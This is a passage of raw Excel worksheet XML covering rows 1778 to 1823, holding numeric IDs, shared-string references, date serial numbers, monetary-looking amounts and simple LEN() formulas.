      <c r="D1778" t="s">
        <v>9763</v>
      </c>
      <c r="E1778">
        <v>11</v>
      </c>
      <c r="F1778" t="s">
        <v>2924</v>
      </c>
      <c r="G1778" s="1">
        <v>43853</v>
      </c>
      <c r="H1778">
        <v>50000</v>
      </c>
      <c r="K1778">
        <f>LEN(I1778)</f>
        <v>0</v>
      </c>
      <c r="L1778">
        <f>LEN(J1778)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1779" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1779">
        <v>17311</v>
      </c>
      <c r="B1779">
        <v>1057</v>
      </c>
      <c r="C1779" t="s">
        <v>2895</v>
      </c>
      <c r="D1779" t="s">
        <v>9768</v>
      </c>
      <c r="E1779">
        <v>11</v>
      </c>
      <c r="F1779" t="s">
        <v>2236</v>
      </c>
      <c r="G1779" s="1">
        <v>43840</v>
      </c>
      <c r="H1779">
        <v>350000</v>
      </c>
      <c r="K1779">
        <f>LEN(I1779)</f>
        <v>0</v>
      </c>
      <c r="L1779">
        <f>LEN(J1779)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1780" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1780">
        <v>17328</v>
      </c>
      <c r="B1780">
        <v>796</v>
      </c>
      <c r="C1780" t="s">
        <v>467</v>
      </c>
      <c r="D1780" t="s">
        <v>9770</v>
      </c>
      <c r="E1780">
        <v>2</v>
      </c>
      <c r="F1780" t="s">
        <v>9771</v>
      </c>
      <c r="G1780" s="1">
        <v>43861</v>
      </c>
      <c r="H1780">
        <v>0</v>
      </c>
      <c r="K1780">
        <f>LEN(I1780)</f>
        <v>0</v>
      </c>
      <c r="L1780">
        <f>LEN(J1780)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1781" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1781">
        <v>17332</v>
      </c>
      <c r="B1781">
        <v>796</v>
      </c>
      <c r="C1781" t="s">
        <v>467</v>
      </c>
      <c r="D1781" t="s">
        <v>9770</v>
      </c>
      <c r="E1781">
        <v>2</v>
      </c>
      <c r="F1781" t="s">
        <v>9772</v>
      </c>
      <c r="G1781" s="1">
        <v>43861</v>
      </c>
      <c r="H1781">
        <v>0</v>
      </c>
      <c r="K1781">
        <f>LEN(I1781)</f>
        <v>0</v>
      </c>
      <c r="L1781">
        <f>LEN(J1781)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1782" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1782">
        <v>17354</v>
      </c>
      <c r="B1782">
        <v>2109</v>
      </c>
      <c r="C1782" t="s">
        <v>4741</v>
      </c>
      <c r="D1782" t="s">
        <v>9773</v>
      </c>
      <c r="E1782">
        <v>13</v>
      </c>
      <c r="F1782" t="s">
        <v>9676</v>
      </c>
      <c r="G1782" s="1">
        <v>44153</v>
      </c>
      <c r="H1782">
        <v>10000000</v>
      </c>
      <c r="K1782">
        <f>LEN(I1782)</f>
        <v>0</v>
      </c>
      <c r="L1782">
        <f>LEN(J1782)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1783" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1783">
        <v>17374</v>
      </c>
      <c r="B1783">
        <v>1240</v>
      </c>
      <c r="C1783" t="s">
        <v>2554</v>
      </c>
      <c r="D1783" t="s">
        <v>9781</v>
      </c>
      <c r="E1783">
        <v>1</v>
      </c>
      <c r="F1783" t="s">
        <v>2236</v>
      </c>
      <c r="G1783" s="1">
        <v>43910</v>
      </c>
      <c r="H1783">
        <v>0</v>
      </c>
      <c r="K1783">
        <f>LEN(I1783)</f>
        <v>0</v>
      </c>
      <c r="L1783">
        <f>LEN(J1783)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1784" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1784">
        <v>17413</v>
      </c>
      <c r="B1784">
        <v>1240</v>
      </c>
      <c r="C1784" t="s">
        <v>2554</v>
      </c>
      <c r="D1784" t="s">
        <v>9781</v>
      </c>
      <c r="E1784">
        <v>1</v>
      </c>
      <c r="F1784" t="s">
        <v>9783</v>
      </c>
      <c r="G1784" s="1">
        <v>43910</v>
      </c>
      <c r="H1784">
        <v>0</v>
      </c>
      <c r="K1784">
        <f>LEN(I1784)</f>
        <v>0</v>
      </c>
      <c r="L1784">
        <f>LEN(J1784)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1785" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1785">
        <v>17415</v>
      </c>
      <c r="B1785">
        <v>1240</v>
      </c>
      <c r="C1785" t="s">
        <v>2554</v>
      </c>
      <c r="D1785" t="s">
        <v>9781</v>
      </c>
      <c r="E1785">
        <v>1</v>
      </c>
      <c r="F1785" t="s">
        <v>3763</v>
      </c>
      <c r="G1785" s="1">
        <v>43910</v>
      </c>
      <c r="H1785">
        <v>0</v>
      </c>
      <c r="K1785">
        <f>LEN(I1785)</f>
        <v>0</v>
      </c>
      <c r="L1785">
        <f>LEN(J1785)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1786" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1786">
        <v>17420</v>
      </c>
      <c r="B1786">
        <v>1240</v>
      </c>
      <c r="C1786" t="s">
        <v>2554</v>
      </c>
      <c r="D1786" t="s">
        <v>9781</v>
      </c>
      <c r="E1786">
        <v>1</v>
      </c>
      <c r="F1786" t="s">
        <v>6917</v>
      </c>
      <c r="G1786" s="1">
        <v>43910</v>
      </c>
      <c r="H1786">
        <v>0</v>
      </c>
      <c r="K1786">
        <f>LEN(I1786)</f>
        <v>0</v>
      </c>
      <c r="L1786">
        <f>LEN(J1786)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1787" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1787">
        <v>17423</v>
      </c>
      <c r="B1787">
        <v>1240</v>
      </c>
      <c r="C1787" t="s">
        <v>2554</v>
      </c>
      <c r="D1787" t="s">
        <v>9781</v>
      </c>
      <c r="E1787">
        <v>1</v>
      </c>
      <c r="F1787" t="s">
        <v>4686</v>
      </c>
      <c r="G1787" s="1">
        <v>43910</v>
      </c>
      <c r="H1787">
        <v>0</v>
      </c>
      <c r="K1787">
        <f>LEN(I1787)</f>
        <v>0</v>
      </c>
      <c r="L1787">
        <f>LEN(J1787)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1788" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1788">
        <v>17424</v>
      </c>
      <c r="B1788">
        <v>2242</v>
      </c>
      <c r="C1788" t="s">
        <v>5031</v>
      </c>
      <c r="D1788" t="s">
        <v>9784</v>
      </c>
      <c r="E1788">
        <v>13</v>
      </c>
      <c r="F1788" t="s">
        <v>5033</v>
      </c>
      <c r="G1788" s="1">
        <v>43896</v>
      </c>
      <c r="H1788">
        <v>3000</v>
      </c>
      <c r="K1788">
        <f>LEN(I1788)</f>
        <v>0</v>
      </c>
      <c r="L1788">
        <f>LEN(J1788)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1789" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1789">
        <v>17446</v>
      </c>
      <c r="B1789">
        <v>2234</v>
      </c>
      <c r="C1789" t="s">
        <v>5999</v>
      </c>
      <c r="D1789" t="s">
        <v>9789</v>
      </c>
      <c r="E1789">
        <v>7</v>
      </c>
      <c r="F1789" t="s">
        <v>9792</v>
      </c>
      <c r="G1789" s="1">
        <v>43934</v>
      </c>
      <c r="H1789">
        <v>3300</v>
      </c>
      <c r="K1789">
        <f>LEN(I1789)</f>
        <v>0</v>
      </c>
      <c r="L1789">
        <f>LEN(J1789)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1790" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1790">
        <v>17451</v>
      </c>
      <c r="B1790">
        <v>2051</v>
      </c>
      <c r="C1790" t="s">
        <v>5476</v>
      </c>
      <c r="D1790" t="s">
        <v>9793</v>
      </c>
      <c r="E1790">
        <v>16</v>
      </c>
      <c r="F1790" t="s">
        <v>2236</v>
      </c>
      <c r="G1790" s="1">
        <v>43871</v>
      </c>
      <c r="H1790">
        <v>120000</v>
      </c>
      <c r="K1790">
        <f>LEN(I1790)</f>
        <v>0</v>
      </c>
      <c r="L1790">
        <f>LEN(J1790)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1791" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1791">
        <v>17459</v>
      </c>
      <c r="B1791">
        <v>680</v>
      </c>
      <c r="C1791" t="s">
        <v>16287</v>
      </c>
      <c r="D1791" t="s">
        <v>16288</v>
      </c>
      <c r="E1791">
        <v>17</v>
      </c>
      <c r="F1791" t="s">
        <v>9459</v>
      </c>
      <c r="G1791" s="1">
        <v>43970</v>
      </c>
      <c r="H1791" s="4">
        <v>100000</v>
      </c>
      <c r="K1791">
        <f>LEN(I1791)</f>
        <v>0</v>
      </c>
      <c r="L1791">
        <f>LEN(J1791)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1792" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1792">
        <v>17460</v>
      </c>
      <c r="B1792">
        <v>680</v>
      </c>
      <c r="C1792" t="s">
        <v>16287</v>
      </c>
      <c r="D1792" t="s">
        <v>16288</v>
      </c>
      <c r="E1792">
        <v>17</v>
      </c>
      <c r="F1792" t="s">
        <v>609</v>
      </c>
      <c r="G1792" s="1">
        <v>43970</v>
      </c>
      <c r="H1792" s="4">
        <v>50000</v>
      </c>
      <c r="K1792">
        <f>LEN(I1792)</f>
        <v>0</v>
      </c>
      <c r="L1792">
        <f>LEN(J1792)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1793" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1793">
        <v>17461</v>
      </c>
      <c r="B1793">
        <v>680</v>
      </c>
      <c r="C1793" t="s">
        <v>16287</v>
      </c>
      <c r="D1793" t="s">
        <v>16288</v>
      </c>
      <c r="E1793">
        <v>17</v>
      </c>
      <c r="F1793" t="s">
        <v>9561</v>
      </c>
      <c r="G1793" s="1">
        <v>43970</v>
      </c>
      <c r="H1793" s="4">
        <v>50000</v>
      </c>
      <c r="K1793">
        <f>LEN(I1793)</f>
        <v>0</v>
      </c>
      <c r="L1793">
        <f>LEN(J1793)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1794" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1794">
        <v>17465</v>
      </c>
      <c r="B1794">
        <v>2021</v>
      </c>
      <c r="C1794" t="s">
        <v>16397</v>
      </c>
      <c r="D1794" t="s">
        <v>16398</v>
      </c>
      <c r="E1794">
        <v>33</v>
      </c>
      <c r="F1794" t="s">
        <v>9797</v>
      </c>
      <c r="G1794" s="1">
        <v>43843</v>
      </c>
      <c r="H1794" s="4">
        <v>90000</v>
      </c>
      <c r="K1794">
        <f>LEN(I1794)</f>
        <v>0</v>
      </c>
      <c r="L1794">
        <f>LEN(J1794)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1795" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1795">
        <v>17473</v>
      </c>
      <c r="B1795">
        <v>18</v>
      </c>
      <c r="C1795" t="s">
        <v>16399</v>
      </c>
      <c r="D1795" t="s">
        <v>16400</v>
      </c>
      <c r="E1795">
        <v>22</v>
      </c>
      <c r="F1795" t="s">
        <v>2442</v>
      </c>
      <c r="G1795" s="1">
        <v>43871</v>
      </c>
      <c r="H1795" s="4">
        <v>10000</v>
      </c>
      <c r="K1795">
        <f>LEN(I1795)</f>
        <v>0</v>
      </c>
      <c r="L1795">
        <f>LEN(J1795)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1796" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1796">
        <v>17507</v>
      </c>
      <c r="B1796">
        <v>186</v>
      </c>
      <c r="C1796" t="s">
        <v>1236</v>
      </c>
      <c r="D1796" t="s">
        <v>9800</v>
      </c>
      <c r="E1796">
        <v>12</v>
      </c>
      <c r="F1796" t="s">
        <v>1746</v>
      </c>
      <c r="G1796" s="1">
        <v>43850</v>
      </c>
      <c r="H1796">
        <v>12000</v>
      </c>
      <c r="K1796">
        <f>LEN(I1796)</f>
        <v>0</v>
      </c>
      <c r="L1796">
        <f>LEN(J1796)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1797" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1797">
        <v>17508</v>
      </c>
      <c r="B1797">
        <v>186</v>
      </c>
      <c r="C1797" t="s">
        <v>1236</v>
      </c>
      <c r="D1797" t="s">
        <v>9800</v>
      </c>
      <c r="E1797">
        <v>12</v>
      </c>
      <c r="F1797" t="s">
        <v>3814</v>
      </c>
      <c r="G1797" s="1">
        <v>43850</v>
      </c>
      <c r="H1797">
        <v>12000</v>
      </c>
      <c r="K1797">
        <f>LEN(I1797)</f>
        <v>0</v>
      </c>
      <c r="L1797">
        <f>LEN(J1797)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1798" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1798">
        <v>17520</v>
      </c>
      <c r="B1798">
        <v>160</v>
      </c>
      <c r="C1798" t="s">
        <v>16401</v>
      </c>
      <c r="D1798" t="s">
        <v>16402</v>
      </c>
      <c r="E1798">
        <v>27</v>
      </c>
      <c r="F1798" t="s">
        <v>1746</v>
      </c>
      <c r="G1798" s="1">
        <v>44075</v>
      </c>
      <c r="H1798" s="4">
        <v>60000</v>
      </c>
      <c r="K1798">
        <f>LEN(I1798)</f>
        <v>0</v>
      </c>
      <c r="L1798">
        <f>LEN(J1798)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1799" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1799">
        <v>17521</v>
      </c>
      <c r="B1799">
        <v>160</v>
      </c>
      <c r="C1799" t="s">
        <v>16401</v>
      </c>
      <c r="D1799" t="s">
        <v>16402</v>
      </c>
      <c r="E1799">
        <v>27</v>
      </c>
      <c r="F1799" t="s">
        <v>9801</v>
      </c>
      <c r="G1799" s="1">
        <v>44075</v>
      </c>
      <c r="H1799" s="4">
        <v>30000</v>
      </c>
      <c r="K1799">
        <f>LEN(I1799)</f>
        <v>0</v>
      </c>
      <c r="L1799">
        <f>LEN(J1799)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1800" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1800">
        <v>17522</v>
      </c>
      <c r="B1800">
        <v>160</v>
      </c>
      <c r="C1800" t="s">
        <v>16401</v>
      </c>
      <c r="D1800" t="s">
        <v>16402</v>
      </c>
      <c r="E1800">
        <v>27</v>
      </c>
      <c r="F1800" t="s">
        <v>9802</v>
      </c>
      <c r="G1800" s="1">
        <v>44075</v>
      </c>
      <c r="H1800" s="4">
        <v>30000</v>
      </c>
      <c r="K1800">
        <f>LEN(I1800)</f>
        <v>0</v>
      </c>
      <c r="L1800">
        <f>LEN(J1800)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1801" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1801">
        <v>17524</v>
      </c>
      <c r="B1801">
        <v>160</v>
      </c>
      <c r="C1801" t="s">
        <v>16401</v>
      </c>
      <c r="D1801" t="s">
        <v>16402</v>
      </c>
      <c r="E1801">
        <v>27</v>
      </c>
      <c r="F1801" t="s">
        <v>9437</v>
      </c>
      <c r="G1801" s="1">
        <v>44075</v>
      </c>
      <c r="H1801" s="4">
        <v>100000</v>
      </c>
      <c r="K1801">
        <f>LEN(I1801)</f>
        <v>0</v>
      </c>
      <c r="L1801">
        <f>LEN(J1801)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1802" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1802">
        <v>17668</v>
      </c>
      <c r="B1802">
        <v>2206</v>
      </c>
      <c r="C1802" t="s">
        <v>4845</v>
      </c>
      <c r="D1802" t="s">
        <v>9644</v>
      </c>
      <c r="E1802">
        <v>2</v>
      </c>
      <c r="F1802" t="s">
        <v>1746</v>
      </c>
      <c r="G1802" s="1">
        <v>43846</v>
      </c>
      <c r="H1802">
        <v>100000</v>
      </c>
      <c r="K1802">
        <f>LEN(I1802)</f>
        <v>0</v>
      </c>
      <c r="L1802">
        <f>LEN(J1802)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1803" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1803">
        <v>17669</v>
      </c>
      <c r="B1803">
        <v>500</v>
      </c>
      <c r="C1803" t="s">
        <v>625</v>
      </c>
      <c r="D1803" t="s">
        <v>9803</v>
      </c>
      <c r="E1803">
        <v>11</v>
      </c>
      <c r="F1803" t="s">
        <v>9722</v>
      </c>
      <c r="G1803" s="1">
        <v>43942</v>
      </c>
      <c r="H1803">
        <v>20000</v>
      </c>
      <c r="K1803">
        <f>LEN(I1803)</f>
        <v>0</v>
      </c>
      <c r="L1803">
        <f>LEN(J1803)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1804" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1804">
        <v>17670</v>
      </c>
      <c r="B1804">
        <v>500</v>
      </c>
      <c r="C1804" t="s">
        <v>625</v>
      </c>
      <c r="D1804" t="s">
        <v>9803</v>
      </c>
      <c r="E1804">
        <v>11</v>
      </c>
      <c r="F1804" t="s">
        <v>9459</v>
      </c>
      <c r="G1804" s="1">
        <v>43942</v>
      </c>
      <c r="H1804">
        <v>20000</v>
      </c>
      <c r="K1804">
        <f>LEN(I1804)</f>
        <v>0</v>
      </c>
      <c r="L1804">
        <f>LEN(J1804)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1805" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1805">
        <v>17671</v>
      </c>
      <c r="B1805">
        <v>500</v>
      </c>
      <c r="C1805" t="s">
        <v>625</v>
      </c>
      <c r="D1805" t="s">
        <v>9803</v>
      </c>
      <c r="E1805">
        <v>11</v>
      </c>
      <c r="F1805" t="s">
        <v>9460</v>
      </c>
      <c r="G1805" s="1">
        <v>43942</v>
      </c>
      <c r="H1805">
        <v>20000</v>
      </c>
      <c r="K1805">
        <f>LEN(I1805)</f>
        <v>0</v>
      </c>
      <c r="L1805">
        <f>LEN(J1805)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1806" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1806">
        <v>17672</v>
      </c>
      <c r="B1806">
        <v>500</v>
      </c>
      <c r="C1806" t="s">
        <v>625</v>
      </c>
      <c r="D1806" t="s">
        <v>9803</v>
      </c>
      <c r="E1806">
        <v>11</v>
      </c>
      <c r="F1806" t="s">
        <v>1746</v>
      </c>
      <c r="G1806" s="1">
        <v>43942</v>
      </c>
      <c r="H1806">
        <v>20000</v>
      </c>
      <c r="K1806">
        <f>LEN(I1806)</f>
        <v>0</v>
      </c>
      <c r="L1806">
        <f>LEN(J1806)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1807" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1807">
        <v>17673</v>
      </c>
      <c r="B1807">
        <v>500</v>
      </c>
      <c r="C1807" t="s">
        <v>625</v>
      </c>
      <c r="D1807" t="s">
        <v>9803</v>
      </c>
      <c r="E1807">
        <v>11</v>
      </c>
      <c r="F1807" t="s">
        <v>9523</v>
      </c>
      <c r="G1807" s="1">
        <v>43942</v>
      </c>
      <c r="H1807">
        <v>20000</v>
      </c>
      <c r="K1807">
        <f>LEN(I1807)</f>
        <v>0</v>
      </c>
      <c r="L1807">
        <f>LEN(J1807)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1808" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1808">
        <v>17676</v>
      </c>
      <c r="B1808">
        <v>500</v>
      </c>
      <c r="C1808" t="s">
        <v>625</v>
      </c>
      <c r="D1808" t="s">
        <v>9803</v>
      </c>
      <c r="E1808">
        <v>11</v>
      </c>
      <c r="F1808" t="s">
        <v>9595</v>
      </c>
      <c r="G1808" s="1">
        <v>43942</v>
      </c>
      <c r="H1808">
        <v>20000</v>
      </c>
      <c r="K1808">
        <f>LEN(I1808)</f>
        <v>0</v>
      </c>
      <c r="L1808">
        <f>LEN(J1808)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1809" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1809">
        <v>17678</v>
      </c>
      <c r="B1809">
        <v>500</v>
      </c>
      <c r="C1809" t="s">
        <v>625</v>
      </c>
      <c r="D1809" t="s">
        <v>9803</v>
      </c>
      <c r="E1809">
        <v>11</v>
      </c>
      <c r="F1809" t="s">
        <v>9807</v>
      </c>
      <c r="G1809" s="1">
        <v>43942</v>
      </c>
      <c r="H1809">
        <v>5000</v>
      </c>
      <c r="K1809">
        <f>LEN(I1809)</f>
        <v>0</v>
      </c>
      <c r="L1809">
        <f>LEN(J1809)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1810" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1810">
        <v>17679</v>
      </c>
      <c r="B1810">
        <v>500</v>
      </c>
      <c r="C1810" t="s">
        <v>625</v>
      </c>
      <c r="D1810" t="s">
        <v>9803</v>
      </c>
      <c r="E1810">
        <v>11</v>
      </c>
      <c r="F1810" t="s">
        <v>2236</v>
      </c>
      <c r="G1810" s="1">
        <v>43942</v>
      </c>
      <c r="H1810">
        <v>10000</v>
      </c>
      <c r="K1810">
        <f>LEN(I1810)</f>
        <v>0</v>
      </c>
      <c r="L1810">
        <f>LEN(J1810)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1811" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1811">
        <v>17710</v>
      </c>
      <c r="B1811">
        <v>1183</v>
      </c>
      <c r="C1811" t="s">
        <v>2579</v>
      </c>
      <c r="D1811" t="s">
        <v>9808</v>
      </c>
      <c r="E1811">
        <v>16</v>
      </c>
      <c r="F1811" t="s">
        <v>1746</v>
      </c>
      <c r="G1811" s="1">
        <v>43861</v>
      </c>
      <c r="H1811">
        <v>500</v>
      </c>
      <c r="K1811">
        <f>LEN(I1811)</f>
        <v>0</v>
      </c>
      <c r="L1811">
        <f>LEN(J1811)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1812" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1812">
        <v>17716</v>
      </c>
      <c r="B1812">
        <v>1183</v>
      </c>
      <c r="C1812" t="s">
        <v>2579</v>
      </c>
      <c r="D1812" t="s">
        <v>9808</v>
      </c>
      <c r="E1812">
        <v>16</v>
      </c>
      <c r="F1812" t="s">
        <v>7241</v>
      </c>
      <c r="G1812" s="1">
        <v>43861</v>
      </c>
      <c r="H1812">
        <v>1000</v>
      </c>
      <c r="K1812">
        <f>LEN(I1812)</f>
        <v>0</v>
      </c>
      <c r="L1812">
        <f>LEN(J1812)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1813" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1813">
        <v>17843</v>
      </c>
      <c r="B1813">
        <v>2183</v>
      </c>
      <c r="C1813" t="s">
        <v>5354</v>
      </c>
      <c r="D1813" t="s">
        <v>9816</v>
      </c>
      <c r="E1813">
        <v>12</v>
      </c>
      <c r="F1813" t="s">
        <v>9527</v>
      </c>
      <c r="G1813" s="1">
        <v>43998</v>
      </c>
      <c r="H1813">
        <v>100000</v>
      </c>
      <c r="K1813">
        <f>LEN(I1813)</f>
        <v>0</v>
      </c>
      <c r="L1813">
        <f>LEN(J1813)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1814" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1814">
        <v>17844</v>
      </c>
      <c r="B1814">
        <v>2183</v>
      </c>
      <c r="C1814" t="s">
        <v>5354</v>
      </c>
      <c r="D1814" t="s">
        <v>9816</v>
      </c>
      <c r="E1814">
        <v>12</v>
      </c>
      <c r="F1814" t="s">
        <v>9437</v>
      </c>
      <c r="G1814" s="1">
        <v>43998</v>
      </c>
      <c r="H1814">
        <v>100000</v>
      </c>
      <c r="K1814">
        <f>LEN(I1814)</f>
        <v>0</v>
      </c>
      <c r="L1814">
        <f>LEN(J1814)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1815" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1815">
        <v>17845</v>
      </c>
      <c r="B1815">
        <v>2183</v>
      </c>
      <c r="C1815" t="s">
        <v>5354</v>
      </c>
      <c r="D1815" t="s">
        <v>9816</v>
      </c>
      <c r="E1815">
        <v>12</v>
      </c>
      <c r="F1815" t="s">
        <v>9817</v>
      </c>
      <c r="G1815" s="1">
        <v>43998</v>
      </c>
      <c r="H1815">
        <v>100000</v>
      </c>
      <c r="K1815">
        <f>LEN(I1815)</f>
        <v>0</v>
      </c>
      <c r="L1815">
        <f>LEN(J1815)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1816" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1816">
        <v>17846</v>
      </c>
      <c r="B1816">
        <v>2183</v>
      </c>
      <c r="C1816" t="s">
        <v>5354</v>
      </c>
      <c r="D1816" t="s">
        <v>9816</v>
      </c>
      <c r="E1816">
        <v>12</v>
      </c>
      <c r="F1816" t="s">
        <v>9818</v>
      </c>
      <c r="G1816" s="1">
        <v>43998</v>
      </c>
      <c r="H1816">
        <v>100000</v>
      </c>
      <c r="K1816">
        <f>LEN(I1816)</f>
        <v>0</v>
      </c>
      <c r="L1816">
        <f>LEN(J1816)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1817" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1817">
        <v>17847</v>
      </c>
      <c r="B1817">
        <v>2183</v>
      </c>
      <c r="C1817" t="s">
        <v>5354</v>
      </c>
      <c r="D1817" t="s">
        <v>9816</v>
      </c>
      <c r="E1817">
        <v>12</v>
      </c>
      <c r="F1817" t="s">
        <v>9819</v>
      </c>
      <c r="G1817" s="1">
        <v>43998</v>
      </c>
      <c r="H1817">
        <v>100000</v>
      </c>
      <c r="K1817">
        <f>LEN(I1817)</f>
        <v>0</v>
      </c>
      <c r="L1817">
        <f>LEN(J1817)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1818" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1818">
        <v>17848</v>
      </c>
      <c r="B1818">
        <v>2183</v>
      </c>
      <c r="C1818" t="s">
        <v>5354</v>
      </c>
      <c r="D1818" t="s">
        <v>9816</v>
      </c>
      <c r="E1818">
        <v>12</v>
      </c>
      <c r="F1818" t="s">
        <v>9820</v>
      </c>
      <c r="G1818" s="1">
        <v>43998</v>
      </c>
      <c r="H1818">
        <v>100000</v>
      </c>
      <c r="K1818">
        <f>LEN(I1818)</f>
        <v>0</v>
      </c>
      <c r="L1818">
        <f>LEN(J1818)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1819" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1819">
        <v>17862</v>
      </c>
      <c r="B1819">
        <v>2390</v>
      </c>
      <c r="C1819" t="s">
        <v>5376</v>
      </c>
      <c r="D1819" t="s">
        <v>9821</v>
      </c>
      <c r="E1819">
        <v>12</v>
      </c>
      <c r="F1819" t="s">
        <v>547</v>
      </c>
      <c r="G1819" s="1">
        <v>43873</v>
      </c>
      <c r="H1819">
        <v>100000</v>
      </c>
      <c r="K1819">
        <f>LEN(I1819)</f>
        <v>0</v>
      </c>
      <c r="L1819">
        <f>LEN(J1819)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1820" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1820">
        <v>17863</v>
      </c>
      <c r="B1820">
        <v>2390</v>
      </c>
      <c r="C1820" t="s">
        <v>5376</v>
      </c>
      <c r="D1820" t="s">
        <v>9821</v>
      </c>
      <c r="E1820">
        <v>12</v>
      </c>
      <c r="F1820" t="s">
        <v>9472</v>
      </c>
      <c r="G1820" s="1">
        <v>43873</v>
      </c>
      <c r="H1820">
        <v>100000</v>
      </c>
      <c r="K1820">
        <f>LEN(I1820)</f>
        <v>0</v>
      </c>
      <c r="L1820">
        <f>LEN(J1820)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1821" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1821">
        <v>17864</v>
      </c>
      <c r="B1821">
        <v>2390</v>
      </c>
      <c r="C1821" t="s">
        <v>5376</v>
      </c>
      <c r="D1821" t="s">
        <v>9821</v>
      </c>
      <c r="E1821">
        <v>12</v>
      </c>
      <c r="F1821" t="s">
        <v>9822</v>
      </c>
      <c r="G1821" s="1">
        <v>43873</v>
      </c>
      <c r="H1821">
        <v>100000</v>
      </c>
      <c r="K1821">
        <f>LEN(I1821)</f>
        <v>0</v>
      </c>
      <c r="L1821">
        <f>LEN(J1821)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1822" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1822">
        <v>17890</v>
      </c>
      <c r="B1822">
        <v>2390</v>
      </c>
      <c r="C1822" t="s">
        <v>5376</v>
      </c>
      <c r="D1822" t="s">
        <v>9821</v>
      </c>
      <c r="E1822">
        <v>12</v>
      </c>
      <c r="F1822" t="s">
        <v>9825</v>
      </c>
      <c r="G1822" s="1">
        <v>43873</v>
      </c>
      <c r="H1822">
        <v>10000</v>
      </c>
      <c r="K1822">
        <f>LEN(I1822)</f>
        <v>0</v>
      </c>
      <c r="L1822">
        <f>LEN(J1822)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1823" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1823">
        <v>17957</v>
      </c>
      <c r="B1823">
        <v>709</v>
      </c>
      <c r="C1823" t="s">
        <v>781</v>
      </c>
      <c r="D1823" t="s">
        <v>9826</v>
      </c>
      <c r="E1823">
        <v>31</v>
      </c>
      <c r="F1823" t="s">
        <v>9827</v>
      </c>
      <c r="G1823" s="1">
        <v>44106</v>
